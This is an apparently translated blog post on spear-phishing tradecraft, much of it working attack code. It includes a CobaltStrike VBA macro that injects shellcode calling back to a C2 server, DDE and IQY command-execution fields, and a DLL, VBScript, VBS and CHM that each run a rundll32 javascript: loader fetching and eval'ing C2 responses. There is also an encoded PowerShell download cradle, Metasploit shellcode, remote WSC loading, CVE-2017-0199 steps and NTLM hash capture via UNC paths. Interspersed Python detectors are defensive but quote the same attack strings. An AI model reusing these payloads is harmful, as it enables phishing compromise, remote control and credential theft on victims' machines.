@Author: Patrilic
@Time: 2019-07-18 11:20:33

Spear phishing is a common attack form. Its core idea is to disguise shellcode in some form, lure the victim into launching it, and then use a C2 server for remote command execution.

The hard parts of spear phishing:

  1. Forging trust – common approaches are forging mail with swaks, DNS hijacking, and modifying a trusted website
  2. AV evasion – evading most of the antivirus products on the market without being detected
  3. Persistence – long-term control, auto-start on boot
  4. Staying hidden – never touching disk, living inside another process, certutil, and so on

This article summarizes some of the more common techniques. It is not meant to be polished writing, so read it casually; some scripts are copied directly from master @3gstudent, and the CobaltStrike Spear phish and Nginx tricks will be summarized separately.

0x00 Office

Office Macro

Office documents have built-in macros; VB can run remote commands that call back to the C2 server.
Below is a macro sample generated by CobaltStrike:

' Structures filled in by CreateProcessA
Private Type PROCESS_INFORMATION
    hProcess As Long
    hThread As Long
    dwProcessId As Long
    dwThreadId As Long
End Type

Private Type STARTUPINFO
    cb As Long
    lpReserved As String
    lpDesktop As String
    lpTitle As String
    dwX As Long
    dwY As Long
    dwXSize As Long
    dwYSize As Long
    dwXCountChars As Long
    dwYCountChars As Long
    dwFillAttribute As Long
    dwFlags As Long
    wShowWindow As Integer
    cbReserved2 As Integer
    lpReserved2 As Long
    hStdInput As Long
    hStdOutput As Long
    hStdError As Long
End Type

' Win32 injection APIs imported under innocuous local names; the Alias clause carries the real export
#If VBA7 Then
    Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
    Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
    Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
    Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
    Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
    Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
    Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
    Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

Sub Auto_Open()
    Dim myByte As Long, myArray As Variant, offset As Long
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String

#If VBA7 Then
    Dim rwxpage As LongPtr, res As LongPtr
#Else
    Dim rwxpage As Long, res As Long
#End If
    ' Shellcode stored as signed bytes (the array carries a wininet User-Agent string and the C2 address)
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,-46,4,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,74,112,110,52,0,71,-37,19,-87,58,-110,11,66,63,40,-36,-114,-75,-101,62,108,29,-115,-75,-106,35,-3,71,126,24,-107,101,80,116,13,70,52, _
101,6,59,-12,-45,32,103,-104,10,62,77,18,-84,12,58,23,80,56,-75,32,-39,8,-80,107,-43,108,71,63,20,41,-82,-42,23,58,-126,98,-100,-108,-126,76, _
-44,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,84,114,105,100,101,110,116,47,53,46,48,59,32,66,79, _
73,69,57,59,69,78,85,83,77,83,69,41,13,10,0,53,-24,107,-26,-93,106,-40,-71,-105,-127,-22,100,-16,117,-9,83,112,-101,60,-4,105,72,-127,96,-60, _
-29,27,-62,-29,98,-95,-56,-46,-6,-57,-39,7,23,-70,101,-16,86,-85,-15,25,102,48,-46,-118,-62,1,-19,85,56,18,-105,41,124,102,116,-54,50,-67,81,-20, _
40,-19,-52,101,6,116,118,-128,-118,-9,-46,-96,-122,116,-70,107,-54,-78,59,119,-51,-52,5,96,53,-9,-60,102,-96,109,-90,-122,-92,-81,34,-70,-106,10,7,121, _
-6,-5,-12,107,-44,73,-31,52,87,-89,13,77,-121,-68,-37,74,-23,54,59,-122,79,66,65,-39,58,121,-100,20,53,28,27,-15,29,52,-107,127,-89,40,-4,-122, _
-73,-101,75,-64,-59,111,105,16,79,-121,7,33,-121,58,125,79,59,31,-97,-45,25,105,90,-99,6,38,74,-22,86,17,-99,-58,-36,55,5,-96,-109,48,42,-66, _
-23,-116,-38,-13,-33,89,30,32,90,53,11,119,118,-33,-48,77,24,-76,-11,44,50,-68,-127,-70,-43,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,52,53,46,51,50,46,55,56,46,49,49,55,0,111,-86,81,-61)
    ' On 64-bit Windows pick the 32-bit rundll32.exe, since the shellcode is x86
    If Len(Environ("ProgramW6432")) > 0 Then
        sProc = Environ("windir") & "\SysWOW64\rundll32.exe"
    Else
        sProc = Environ("windir") & "\System32\rundll32.exe"
    End If

    ' CreateProcessA: start rundll32.exe suspended (dwCreationFlags = 4 = CREATE_SUSPENDED)
    res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

    ' VirtualAllocEx: MEM_COMMIT (&H1000) + PAGE_EXECUTE_READWRITE (&H40) in the new process
    rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
    ' WriteProcessMemory: copy the shellcode one byte at a time
    For offset = LBound(myArray) To UBound(myArray)
        myByte = myArray(offset)
        res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
    Next offset
    ' CreateRemoteThread: run the shellcode inside rundll32.exe
    res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
' Auto-run entry points for Word and Excel
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub

Code analysis: sProc is the path to rundll32.exe.
RunStuff -> CreateProcessA creates a rundll32 process, AllocStuff -> VirtualAllocEx reserves memory in it, WriteStuff -> WriteProcessMemory injects the shellcode (myArray), and CreateStuff -> CreateRemoteThread runs it.

PS: macro backdoors can also be generated with tools such as Msf or Empire.
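As an added example for this section (not part of the original post or of the CobaltStrike template), here is a small Python triage heuristic for VBA source of the kind shown above: it flags auto-run entry points, Declare statements whose Alias names a Win32 injection API, long numeric Array literals and references to script hosts. The VBA snippets inside it are constructed for the demo; in practice the source would be extracted first with oletools' olevba.

```python
import re

# Constructed VBA fragment (not the page's sample) that mirrors its shape:
# Win32 injection APIs imported under harmless-looking aliases, an auto-run
# entry point, and a long signed-byte array.
SAMPLE_VBA = '''
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String) As Long

Sub Auto_Open()
    myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15)
    sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_VBA = '''
Sub FormatReport()
    Range("A1").Font.Bold = True
End Sub
'''

# Win32 APIs that a document macro has no ordinary reason to import.
INJECTION_APIS = {
    "VirtualAlloc", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    "CreateThread", "CreateProcessA", "CreateProcessW", "RtlMoveMemory",
}

AUTORUN_RE = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+(Auto_?Open|Document_Open|Workbook_Open|AutoExec)\b",
    re.I | re.M)
# Declare [PtrSafe] Function/Sub <local> Lib "<dll>" [Alias "<real export>"]
DECLARE_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?',
    re.I | re.M)
# Array(...) literal with at least 20 numeric elements: typical embedded shellcode
BYTE_ARRAY_RE = re.compile(r"Array\s*\(\s*(?:-?\d+\s*,\s*){20,}", re.I)
LOLBIN_RE = re.compile(r"\b(rundll32|regsvr32|mshta|powershell|certutil|wscript|cscript)(?:\.exe)?\b", re.I)


def triage_vba(source):
    """Return the static indicators found in a VBA module's source text."""
    win32_api = set()
    aliased = []
    for m in DECLARE_RE.finditer(source):
        local_name, alias = m.group(1), m.group(3)
        real_name = alias or local_name
        if real_name in INJECTION_APIS:
            win32_api.add(real_name)
        if alias and alias.lower() != local_name.lower():
            aliased.append(f"{local_name} -> {alias}")
    return {
        "autorun": sorted({m.group(1) for m in AUTORUN_RE.finditer(source)}),
        "win32_api": sorted(win32_api),
        "aliased_declares": aliased,
        "byte_array": bool(BYTE_ARRAY_RE.search(source)),
        "lolbins": sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(source)}),
    }


def score(findings):
    """Weighted score: auto-run alone is common, injection APIs and byte arrays are not."""
    s = 0
    if findings["autorun"]:
        s += 1
    s += 2 * len(findings["win32_api"])
    if findings["byte_array"]:
        s += 3
    s += len(findings["lolbins"])
    return s


def verdict(source, threshold=4):
    findings = triage_vba(source)
    s = score(findings)
    return ("suspicious" if s >= threshold else "ok", s, findings)


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        v, s, f = verdict(src)
        print(f"{label}: {v} (score {s}) {f}")
```

The weights are a starting point, not a calibrated model: an aliased Declare of CreateRemoteThread is almost never legitimate in a document, whereas an AutoOpen on its own appears in plenty of benign templates.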

Office DDE

Ctrl + F9 (Command + F9) inserts a field; fill in the code:

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" \* MERGEFORMAT


Combined with MSF (web_delivery):

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.0.1/A9IcXi.sct scrobj.dll"

This method requires the victim to confirm launching the process, so it carries some risk.

Excel IQY

IQY is the file type used by Excel Web queries; it can pull content from the internet straight into the sheet.
Data -> Import Data -> New Web Query

=cmd|'/c calc.exe '!A0

The malicious program is called inside the single quotes.

This also requires the victim to confirm launching the process.
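An added example (not from the original post) covering both the DDE field above and the IQY query: a Python checker that joins the instrText runs of a docx document.xml to recover each field code and flags DDE/DDEAUTO, plus a line filter for the =app|topic!item formula shape that Excel evaluates as DDE. The XML fragment and the query response are constructed for the demo.

```python
import re
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# Constructed word/document.xml fragment (not taken from a real document): a DDEAUTO
# field whose code is split over several instrText runs, as Word stores it, plus a
# harmless DATE field. Word doubles backslashes inside field codes, hence c:\\windows.
SAMPLE_DOCUMENT_XML = r'''<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>
<w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\windows\\system32\\cmd.exe </w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">"/k calc.exe" \* MERGEFORMAT </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>Error! No topic specified.</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p>
<w:p><w:fldSimple w:instr=" DATE \@ &quot;d MMMM yyyy&quot; "><w:r><w:t>18 July 2019</w:t></w:r></w:fldSimple></w:p>
</w:body></w:document>'''

# Constructed text as a web query would return it (or as stored in an .iqy/.csv cell).
SAMPLE_QUERY_RESPONSE = "Quarterly figures\n=cmd|'/c calc.exe '!A0\n=SUM(A1:A3)\n"

DDE_FIELD_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.I)
# =app|topic!item is the Excel DDE formula form; anything of that shape is worth a look
DDE_FORMULA_RE = re.compile(r"^\s*=\s*\w+\s*\|.*!")


def extract_field_codes(document_xml):
    """Join the instrText runs of every complex field and collect simple fields."""
    root = ET.fromstring(document_xml)
    codes, current = [], None
    for el in root.iter():  # document order
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                current = []
            elif kind in ("separate", "end") and current is not None:
                codes.append("".join(current).strip())
                current = None
        elif el.tag == W + "instrText" and current is not None:
            current.append(el.text or "")
        elif el.tag == W + "fldSimple":
            codes.append((el.get(W + "instr") or "").strip())
    return codes


def find_dde_fields(document_xml):
    """Field codes that would make Word start an external DDE server on open."""
    return [c for c in extract_field_codes(document_xml) if DDE_FIELD_RE.match(c)]


def find_dde_formulas(text):
    """Lines in query output / CSV text that Excel would evaluate as DDE formulas."""
    return [line.strip() for line in text.splitlines() if DDE_FORMULA_RE.match(line)]


if __name__ == "__main__":
    print(find_dde_fields(SAMPLE_DOCUMENT_XML))
    print(find_dde_formulas(SAMPLE_QUERY_RESPONSE))
```

Joining the runs matters: a field code split over three instrText elements never contains the literal string "DDEAUTO" in any single XML node, which is exactly why naive grep-style checks on document.xml miss it. For real files, unzip the docx and feed word/document.xml (and any header/footer parts) to extract_field_codes.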

OLE

OLE - external objects
A common exploitation scenario is CVE-2017-0199.

UNC路径

UNC (Universal Naming Convention)
is simply Windows file sharing.
Classic usage:
https://github.com/0x09AL/WordSteal

Insert an image via a UNC path to capture the target user's NTLM hash.

Powerpoint Button


CVE-2017-0199

Using a feature of RTF, the external component referenced through OLE can be loaded automatically on open; by changing the server's MIME type, the referenced RTF document is parsed as an HTA file and commands are executed.
Affected versions:
Office 2007, Office 2010, Office 2013, Office 2016

Note:
Use Notepad++ to replace, in the generated rtf document,
\object\objautlink\rsltpict with \object\objautlink\objupdate\rsltpict

To change the file server's MIME type, edit the main Apache2 configuration directly:
AddType application/rtf .rtf

CVE-2017-8570

Principle: using the RTF document's Packager.dll together with the %temp% directory, the .sct is stored as a Packager object and then invoked by the rtf document, so that the .sct calls a COM interface to execute commands.

https://github.com/klionsec/PhishingExploit/blob/master/CVE-2017-8570/packager_composite_moniker.py

0x01 Notepad++ dll后门

It uses the import plugin feature built into Notepad++ to load a dll and achieve command execution.

Application scenario: phishing with a fake plugin.

0x02 JSRAT

Javascript Backdoor

The core idea is to use rundll32.exe to execute JavaScript code:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";alert('foo');

So why does this execute? See:
In-depth analysis of the JavaScript backdoor
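An added example (not the original author's code): detection logic for the rundll32 javascript: pattern and the related regsvr32/scrobj.dll scriptlet load, run over constructed Sysmon-style process-creation records. The field names follow Sysmon Event ID 1; the parent-process rule also covers the Office-spawned case from the DDE section. The command lines reuse the patterns and lab IPs already on this page.

```python
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field subset).
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\rundll32.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.136/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){}',
    },
    {
        "Image": r"C:\Windows\System32\regsvr32.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"regsvr32 /s /n /u /i:http://192.168.0.1/A9IcXi.sct scrobj.dll",
    },
    {
        # Benign: Explorer opening a Control Panel applet through rundll32
        "Image": r"C:\Windows\System32\rundll32.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'rundll32.exe "C:\Windows\System32\shell32.dll",Control_RunDLL',
    },
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "powershell.exe", "cmd.exe", "certutil.exe"}

COMMAND_LINE_RULES = [
    # rundll32 handed a javascript: URL (the mshtml.RunHTMLApplication trick)
    ("rundll32_javascript", re.compile(r"rundll32(?:\.exe)?\s+.*javascript:", re.I)),
    ("mshtml_runhtmlapplication", re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I)),
    # regsvr32 loading a remote scriptlet via scrobj.dll
    ("regsvr32_remote_scriptlet", re.compile(r"regsvr32(?:\.exe)?.*\s/i:\s*https?://.*scrobj\.dll", re.I)),
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Names of the rules the event matches (sorted so results are stable)."""
    hits = [name for name, rx in COMMAND_LINE_RULES if rx.search(event["CommandLine"])]
    if basename(event["ParentImage"]) in OFFICE_APPS and basename(event["Image"]) in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    return sorted(hits)


def alerts(events):
    """(image, matched rules) for every event that matched at least one rule."""
    out = []
    for e in events:
        hits = evaluate(e)
        if hits:
            out.append((e["Image"], hits))
    return out


if __name__ == "__main__":
    for image, hits in alerts(SAMPLE_EVENTS):
        print(image, hits)
```

The third record shows why the command-line rules key on the javascript: scheme rather than on rundll32 itself: rundll32 is launched constantly by legitimate Windows components, while a javascript: argument has no benign use.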

JavaScript Phishing

Loading JS via a DLL

#include <windows.h>

// DllMain: on process attach, spawn a hidden rundll32 process that loads the
// remote JavaScript backdoor from http://192.168.1.100/connect
BOOL APIENTRY DllMain(HANDLE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        // rundll32 + mshtml.RunHTMLApplication evaluates the javascript: URL; the script
        // fetches the C2 response and eval()s it, killing rundll32 if the request fails
        char *command = "cmd.exe /c start rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.1.100/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
        WinExec(command, SW_HIDE);
        break;
    }
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

Calls back to JSRat.ps1 on 192.168.1.100.

Loading JS via SWF

Likewise, generate the shellcode with msf's built-in windows/exec module.

Compile it into an swf with Adobe Flash CS6; combined with an Adobe Flash Player vulnerability this gives RCE.

Loading JS via a browser vulnerability

CVE-2014-6332 and similar vulnerabilities:
the page executes VBScript.

<SCRIPT LANGUAGE="VBScript">

function runmumaa()
    On Error Resume Next
    set shell=createobject("wscript.shell")
    shell.run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://192.168.174.136/connect"",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe"",0,true);}",0
end function
</SCRIPT>

Loading JS via VBS

VBS calls Wscript.shell to run the command:

set shell=createobject("wscript.shell")
shell.run "rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WinHttp.WinHttpRequest.5.1"");h.Open(""GET"",""http://192.168.174.136/connect"",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe"",0,true);}",0

Loading JS via CHM

Use a CHM backdoor to load the JS:

<!DOCTYPE html><html><head><title>Mousejack replay</title></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>

This runs calc.exe; replace it with the corresponding JS code.
For example, a remote DownloadString of JSRat to call back to the C2:

powershell -ep bypass -enc PQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsASQBFAFgAIAAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAzADoAOAAwADgAMQAvADEALwAnACkAOwAKAA==

Generating the shellcode

msf5 payload(windows/messagebox) > use windows/exec

msf5 payload(windows/exec) > set CMD rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://192.168.174.136/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}


msf5 payload(windows/exec) > generate -f c

/*
 * windows/exec - 500 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
 * CMD=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.174.136/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
 */
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x72\x75\x6e\x64\x6c\x6c\x33\x32\x2e\x65\x78"
"\x65\x20\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3a\x22\x5c"
"\x2e\x2e\x5c\x6d\x73\x68\x74\x6d\x6c\x2c\x52\x75\x6e\x48\x54"
"\x4d\x4c\x41\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x20\x22"
"\x3b\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65"
"\x28\x29\x3b\x68\x3d\x6e\x65\x77\x25\x32\x30\x41\x63\x74\x69"
"\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x57\x69\x6e\x48"
"\x74\x74\x70\x2e\x57\x69\x6e\x48\x74\x74\x70\x52\x65\x71\x75"
"\x65\x73\x74\x2e\x35\x2e\x31\x22\x29\x3b\x68\x2e\x4f\x70\x65"
"\x6e\x28\x22\x47\x45\x54\x22\x2c\x22\x68\x74\x74\x70\x3a\x2f"
"\x2f\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x37\x34\x2e\x31\x33"
"\x36\x2f\x63\x6f\x6e\x6e\x65\x63\x74\x22\x2c\x66\x61\x6c\x73"
"\x65\x29\x3b\x74\x72\x79\x7b\x68\x2e\x53\x65\x6e\x64\x28\x29"
"\x3b\x42\x3d\x68\x2e\x52\x65\x73\x70\x6f\x6e\x73\x65\x54\x65"
"\x78\x74\x3b\x65\x76\x61\x6c\x28\x42\x29\x3b\x7d\x63\x61\x74"
"\x63\x68\x28\x65\x29\x7b\x6e\x65\x77\x25\x32\x30\x41\x63\x74"
"\x69\x76\x65\x58\x4f\x62\x6a\x65\x63\x74\x28\x22\x57\x53\x63"
"\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c\x22\x29\x2e\x52\x75"
"\x6e\x28\x22\x63\x6d\x64\x20\x2f\x63\x20\x74\x61\x73\x6b\x6b"
"\x69\x6c\x6c\x20\x2f\x66\x20\x2f\x69\x6d\x20\x72\x75\x6e\x64"
"\x6c\x6c\x33\x32\x2e\x65\x78\x65\x22\x2c\x30\x2c\x74\x72\x75"
"\x65\x29\x3b\x7d\x00";

0x03 WSC

WSC: Windows Script Component
WSC is Microsoft's way of creating COM components quickly.
A popular article by lcx from a while back: using wsc to create an asp backdoor.

<?xml version="1.0"?>    

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>

</component>
</package>

A JS file only needs to call the wsc:

GetObject("script:C:\\testwsc\\test.wsc");

It can also be called remotely:

GetObject("script:https://raw.githubusercontent.com/patrilic/Backdoors/master/Wsc_backdoor/test.wsc")

0x04 WMI Backdoor

WMI Backdoor - wooyun Drops

PowerShell usage

  1. Leaves no files on either the client or the server
  2. Does not modify the registry
  3. Implemented purely in PowerShell

Storing the payload filelessly in WMI

$StaticClass = New-Object Management.ManagementClass('root\cimv2', $null, $null)
$StaticClass.Name = 'Win32_EvilClass'
$StaticClass.Put()
